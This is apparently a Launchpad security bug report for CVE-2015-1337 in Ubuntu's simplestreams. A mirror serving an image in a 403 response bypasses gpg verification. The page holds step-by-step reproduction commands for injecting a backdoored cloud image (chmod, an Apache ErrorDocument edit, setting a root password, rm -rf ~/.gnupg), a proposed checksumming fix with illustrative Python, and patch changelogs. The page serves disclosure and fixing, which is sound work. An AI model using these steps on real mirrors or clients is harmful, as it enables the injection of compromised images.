Malicious server can bypass gpg verification and inject malicious images

Bug #1487004 reported by Robie Basak
Affects                 Status        Importance  Assigned to  Milestone
simplestreams (Ubuntu)  Fix Released  Undecided   Unassigned
  Trusty                Fix Released  Undecided   Unassigned
  Vivid                 Fix Released  Undecided   Unassigned
  Wily                  Fix Released  Undecided   Unassigned

Bug Description

If the image file returned by an HTTP simplestreams mirror is returned in the body of a 403 response instead of a standard 200 response, then simplestreams fails to verify the gpg signature yet still returns the image to the caller to be treated as verified. A malicious mirror operator can exploit this behaviour to inject arbitrary disk images to a client posing as signed simplestream images (such as Ubuntu cloud images). If the client isn't using HTTPS (reasonable since simplestreams is supposed to be end-to-end authenticated with gpg) then a man-in-the-middle attack can also achieve malicious image injection in the same way.

My example case does this to a uvtool user; bug 1485785 suggests to me that the same mechanism can be used to compromise images registered in Glance in a production OpenStack deployment.

Steps to reproduce:

1. Start with a fresh Trusty install (I used LXC).
2. sudo apt-get update && sudo apt-get -y install uvtool simplestreams ubuntu-cloudimage-keyring apache2
3. Mirror an image from the upstream Ubuntu cloud image source: sudo sstream-mirror --keyring /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg --max 1 http://cloud-images.ubuntu.com/releases /var/www/html/releases release=trusty arch=amd64 ftype=disk1.img
4. Now copy the mirrored image found in /var/www/html/releases/server/releases/trusty/ to /var/www/html/backdoored.img and maliciously modify it as you wish. mount-image-callback is a useful tool to do this, but cannot run inside LXC. For example, inside the container I did: "sudo cp /var/www/html/{releases/server/releases/trusty/release-20150814/ubuntu-14.04-server-cloudimg-amd64-disk1.img,backdoored.img}" and then, from the host: "sudo mount-image-callback /var/lib/lxc/test2/tmpfs/delta0/var/www/html/backdoored.img chroot _MOUNTPOINT_ passwd root"
5. Force the authentic image URL to 403: sudo chmod 0 /var/www/html/releases/server/releases/trusty/*/*
6. Arrange for the 403 error document to contain the malicious image: sudo sed -i '/DocumentRoot/a\ ErrorDocument 403 /backdoored.img' /etc/apache2/sites-available/000-default.conf
7. Restart Apache: sudo service apache2 restart
8. Work around gpg/simplestreams sudo file ownership issue (DO NOT DO THIS ON YOUR OWN MACHINE!): sudo rm -rf ~/.gnupg
9. Make sure you belong to the libvirtd group for uvtool libvirt access: newgrp libvirtd
10. Sync from local mirror: uvt-simplestreams-libvirt sync --source http://localhost/releases/ arch=amd64 release=trusty

Expected behaviour: gpg authentication failure, file not mirrored

Actual behaviour: malicious image mirrored. Verify by examining the contents of /var/lib/uvtool/libvirt/images/ using mount-image-callback (in my example, you'll see the password I set in /etc/shadow), or if on bare metal, just firing up a VM with uvt-kvm should demonstrate (I've not verified it this way).

Credit is due to bugs 1485456 and 1485785, which made me suspicious enough to do some further investigation.

Tags: patch
Revision history for this message
Scott Moser (smoser) wrote :

This is my current proposed fix.
Basically what we do is create a 'ChecksummingContentSource' and pass it as the contentsource when calling 'insert_item'.

That contentsource will raise an exception if the expected number of bytes (size) are read and size is available.
We log a warning if no checksums are available in the source information.

If there is no 'size' available, currently that would require the consumer of this to invoke 'check'.

It's non-trivial to automatically do that, as we can't just do it in 'close()', as close could be done for any reason and the caller would not generally expect an exception to be raised.

comments?
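The approach in this comment, and the failure in the bug description above (an error document served in place of the image, accepted and passed to the caller without ever being compared against the signed index), as an added example in Python. This is illustrative code written for this page, not simplestreams' own ChecksummingContentSource or insert_item. It assumes a signed index entry carrying a size and a sha256 digest, reads the SS_MISSING_ITEM_CHECKSUM_BEHAVIOR variable named in the changelogs, and adds an assumed 'fail' value for the strict mode proposed in the next comment; the image bytes and index entry are constructed here.

```python
import hashlib
import io
import os
import warnings


class InvalidContentError(Exception):
    """Raised when streamed content does not match its expected size or checksum."""


class ChecksummingContentSource:
    """Read-through wrapper that hashes bytes as they are read (hypothetical helper
    modelled on the fix described in the comment; not simplestreams' own class).

    size:      expected byte count from the signed index, or None if unknown
    checksums: mapping of hash name -> expected hex digest from the signed index
    """

    def __init__(self, source, size=None, checksums=None, missing_behavior=None):
        self._source = source
        self._size = size
        self._expected = dict(checksums or {})
        self._hashers = {}
        for name in self._expected:
            try:
                self._hashers[name] = hashlib.new(name)
            except ValueError:
                pass  # unsupported hash name; any other listed checksum still applies
        self._bytes_read = 0
        # Behaviour when the index carries neither a size nor a usable checksum.
        # 'silent' and the env var come from the changelog; 'fail' is assumed here.
        behavior = missing_behavior or os.environ.get(
            "SS_MISSING_ITEM_CHECKSUM_BEHAVIOR", "warn")
        if not self._hashers and self._size is None:
            msg = "no size or checksum available; content cannot be verified"
            if behavior == "fail":
                raise InvalidContentError(msg)
            if behavior != "silent":
                warnings.warn(msg)

    def read(self, n=-1):
        data = self._source.read(n)
        self._bytes_read += len(data)
        for h in self._hashers.values():
            h.update(data)
        if self._size is not None and self._bytes_read > self._size:
            raise InvalidContentError(
                "read %d bytes, expected only %d" % (self._bytes_read, self._size))
        # Verify as soon as the expected size is reached, or at end of stream,
        # so the error surfaces from read() rather than from close().
        if not data or (self._size is not None and self._bytes_read == self._size):
            self.check()
        return data

    def check(self):
        """Explicit verification; needed when size is unknown and the caller stops early."""
        if self._size is not None and self._bytes_read != self._size:
            raise InvalidContentError(
                "size mismatch: read %d, expected %d" % (self._bytes_read, self._size))
        for name, h in self._hashers.items():
            if h.hexdigest() != self._expected[name]:
                raise InvalidContentError("%s mismatch" % name)
        return True


def fetch_verified(index_entry, body, status=200, chunk=4096):
    """Consume an HTTP body the way a mirror writer would, in chunks, through the
    checksumming source. A non-200 response is never treated as content."""
    if status != 200:
        raise InvalidContentError("HTTP %d response is not image content" % status)
    src = ChecksummingContentSource(
        io.BytesIO(body), size=index_entry.get("size"),
        checksums={k: v for k, v in index_entry.items() if k in ("sha256", "md5")})
    out = bytearray()
    while True:
        data = src.read(chunk)
        if not data:
            break
        out += data
    return bytes(out)


# Constructed sample data standing in for a mirrored image and its signed index
# entry; the backdoored body models the error document from the report and is
# deliberately the same length so only the checksum can tell them apart.
AUTHENTIC_IMAGE = b"\x00" * 10000 + b"authentic cloud image payload"
BACKDOORED_IMAGE = b"\x00" * 10000 + b"backdoored image payload!!!!!"
INDEX_ENTRY = {"size": len(AUTHENTIC_IMAGE),
               "sha256": hashlib.sha256(AUTHENTIC_IMAGE).hexdigest()}


def verifies(body, entry=INDEX_ENTRY, status=200):
    """True if the body passes verification against the index entry, else False."""
    try:
        fetch_verified(entry, body, status=status)
        return True
    except InvalidContentError:
        return False


def missing_metadata_rejected(behavior):
    """True if a source with neither size nor checksum is refused under `behavior`."""
    try:
        ChecksummingContentSource(io.BytesIO(b"data"), missing_behavior=behavior)
        return False
    except InvalidContentError:
        return True
```

With a size in the index the mismatch is raised from the read() call that completes the expected byte count, which is what lets a mirror writer fail the import without relying on close(); with only a checksum the check runs at end of stream, and a caller that stops reading early still has to call check() itself, as the comment notes.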

Revision history for this message
Robie Basak (racb) wrote :

Very quick (30 second look). I agree with the principle of the fix. For the development release, perhaps this should fail hard if size is unavailable, requiring the API user to explicitly disable checksumming if reading with size unavailable is required.

Revision history for this message
Robie Basak (racb) wrote :

Note that I have no objection to altering the consumers instead for a stable fix. I favour this method for a development fix though.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2015-1337

Scott Moser (smoser)
Changed in simplestreams (Ubuntu Trusty):
status: New → Confirmed
Changed in simplestreams (Ubuntu Vivid):
status: New → Confirmed
Changed in simplestreams (Ubuntu Wily):
status: New → Confirmed
no longer affects: simplestreams (Ubuntu Precise)
Revision history for this message
Scott Moser (smoser) wrote :

hi. see attached, i think this is ready to go.
I'm not sure really what the next step is for a security upload.

I will plan on just easily making a new tarball upload for trunk to wily, so i've not done that here.

Revision history for this message
Scott Moser (smoser) wrote :

updated debdiffs to remove .pc and non debian/ dir changes. I had used bzr diff -r to do them.

Revision history for this message
Scott Moser (smoser) wrote :

Attaching a script that automates all of the original reporter's bug report.

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package simplestreams - 0.1.0~bzr354-0ubuntu1.15.04.1

---------------
simplestreams (0.1.0~bzr354-0ubuntu1.15.04.1) vivid-security; urgency=medium

  * SECURITY UPDATE: insufficient verification of GPG signatures
    allowing malicious injection into images
    - debian/patches/lp1487004-use-checksumming-reader.patch: Ensure
      that users of the BasicMirrorWriter get exceptions when importing
      data that has invalid checksum or sizes. (LP: #1487004)
    - CVE-2015-1337
    - debian/patches/lp1487004-sru-safetynet.patch:
      provide a backwards compatible behavior via setting
      SS_MISSING_ITEM_CHECKSUM_BEHAVIOR=silent. See bug for more info.

 -- Scott Moser <email address hidden> Tue, 22 Sep 2015 16:32:45 -0400

Changed in simplestreams (Ubuntu Vivid):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package simplestreams - 0.1.0~bzr341-0ubuntu2.2

---------------
simplestreams (0.1.0~bzr341-0ubuntu2.2) trusty-security; urgency=medium

  * SECURITY UPDATE: insufficient verification of GPG signatures
    allowing malicious injection into images
    - debian/patches/lp1487004-use-checksumming-reader.patch: Ensure
      that users of the BasicMirrorWriter get exceptions when importing
      data that has invalid checksum or sizes. (LP: #1487004)
    - CVE-2015-1337
    - debian/patches/lp1487004-sru-safetynet.patch:
      provide a backwards compatible behavior via setting
      SS_MISSING_ITEM_CHECKSUM_BEHAVIOR=silent. See bug for more info.

 -- Scott Moser <email address hidden> Tue, 22 Sep 2015 17:12:43 -0400

Changed in simplestreams (Ubuntu Trusty):
status: Confirmed → Fix Released
Steve Beattie (sbeattie)
information type: Private Security → Public Security
tags: added: patch
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package simplestreams - 0.1.0~bzr400-0ubuntu1

---------------
simplestreams (0.1.0~bzr400-0ubuntu1) wily; urgency=medium

  * New upstream snapshot.
    - sstream-mirror, sstream-query, sstream-sync: add --no-verify
      flag (LP: #1249018)
    - pep8/flake8 cleanups
    - several closing of filehandle fixes (LP: #1461181)
    - GlanceMirror fix stack trace if no matching entries (LP: #1353724)
    - tools: upstream development tools fixes (not shipped in ubuntu)
    - GlanceMirror: change known Ubuntu arches into appropriate glance
      arch values (LP: #1483159)
    - Ensure all users of 'sync' get checksumming of content by default.
      insert_item now provides a content source that does checksumming
      during reads and raises exception on error (LP: #1487004)
  * debian/README.source: add file, doc how to take upstream snapshot
  * debian/rules: export SS_REQUIRE_DISTRO_INFO so that test
    runs without a dependency on distro-info

 -- Scott Moser <email address hidden> Thu, 24 Sep 2015 21:53:46 -0400

Changed in simplestreams (Ubuntu Wily):
status: Confirmed → Fix Released